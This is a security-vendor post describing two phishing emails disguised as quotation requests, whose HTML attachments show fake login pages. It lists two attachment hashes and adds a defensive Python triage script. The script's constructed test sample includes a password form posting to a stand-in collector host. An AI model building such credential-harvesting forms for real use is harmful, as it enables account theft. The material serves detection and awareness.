The ASEC analysis team has recently been monitoring phishing emails themed around requests for product quotations. These emails are all disguised to look as if they were sent by a high-ranking manager, such as a team leader or department director at a production company or foundry, and they carry .html and .htm attachments. This post covers the two major phishing emails disguised as quotation requests. For convenience, they are referred to as Phishing Email 1 and Phishing Email 2.
Figure 1. Phishing Email 1 in circulation
Figure 2. htm attachment
Opening the .html attachment in Phishing Email 1 displays a screen that asks the user to log in to their account. In keeping with the email's request for a product quotation, the page is made to look like a spreadsheet with content involving ‘orders’.
Figure 3. After logging in
An attempt to log in with arbitrary input redirects the user to an image in Google Docs.
The content of Phishing Email 2 is as follows.
Figure 4. Phishing Email 2 in circulation
Phishing Email 2 also includes content about requesting product quotations inside the attached .htm file.
Figure 5. Account login screen of the attachment
Opening the .htm attachment displays a login screen for email accounts, as shown in Figure 5. Phishing emails disguised as product quotation requests commonly ask users to log in to their accounts in the attached file. Phishing emails built around keywords such as resumes, purchase orders, and quotation requests, as in this case, are continuously being distributed. Users must be cautious when opening emails with these words in the subject.
- Attachment in Phishing Email 1: 51E6BCFBB2B6F5E6563F051E095ACCBE
- Attachment in Phishing Email 2: 77128F8261C73FAF4FD62EC65B31821D
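A mail-triage check for the pattern described above, as an added example that is not part of the original post: it pulls .htm/.html attachments out of a raw message, flags any that contain a password field, lists form targets that point off-host, and compares the file hash with the two values listed here. The hashes are treated as MD5 (an assumption based on their 32-hex-digit length), and the sample message, addresses and `collector.example` URL are constructed.

```python
import hashlib
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser

# Hash values this page lists for the two attachments (assumed to be MD5).
KNOWN_MD5 = {"51e6bcfbb2b6f5e6563f051e095accbe", "77128f8261c73faf4fd62ec65b31821d"}

class LoginFormFinder(HTMLParser):
    """Records password inputs and form action targets in an HTML file."""
    def __init__(self):
        super().__init__()
        self.has_password = False
        self.actions = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True
        elif tag == "form" and a.get("action"):
            self.actions.append(a["action"])

def triage(raw_eml: bytes) -> list:
    """Return one finding per .htm/.html attachment in a raw message."""
    msg = message_from_bytes(raw_eml, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if not name.endswith((".htm", ".html")):
            continue
        data = part.get_payload(decode=True) or b""
        finder = LoginFormFinder()
        finder.feed(data.decode("utf-8", errors="replace"))
        digest = hashlib.md5(data).hexdigest()  # MD5 only to match the listed values
        findings.append({
            "filename": name, "md5": digest, "known_ioc": digest in KNOWN_MD5,
            "login_form": finder.has_password,
            "remote_actions": [u for u in finder.actions
                               if u.lower().startswith(("http://", "https://"))],
        })
    return findings

def build_sample() -> bytes:
    """Constructed sample message; not taken from the campaign."""
    m = EmailMessage()
    m["Subject"], m["From"], m["To"] = "Request for quotation", "a@example.com", "b@example.com"
    m.set_content("Please see the attached order sheet.")
    html = b'<form action="https://collector.example/post"><input type="password" name="p"></form>'
    m.add_attachment(html, maintype="text", subtype="html", filename="Order.htm")
    return m.as_bytes()
```

Calling `triage(build_sample())` returns a single finding with `login_form` set and the form target listed under `remote_actions`; a login form inside an HTML attachment is the signal worth quarantining on, since the hash match only catches these two exact files.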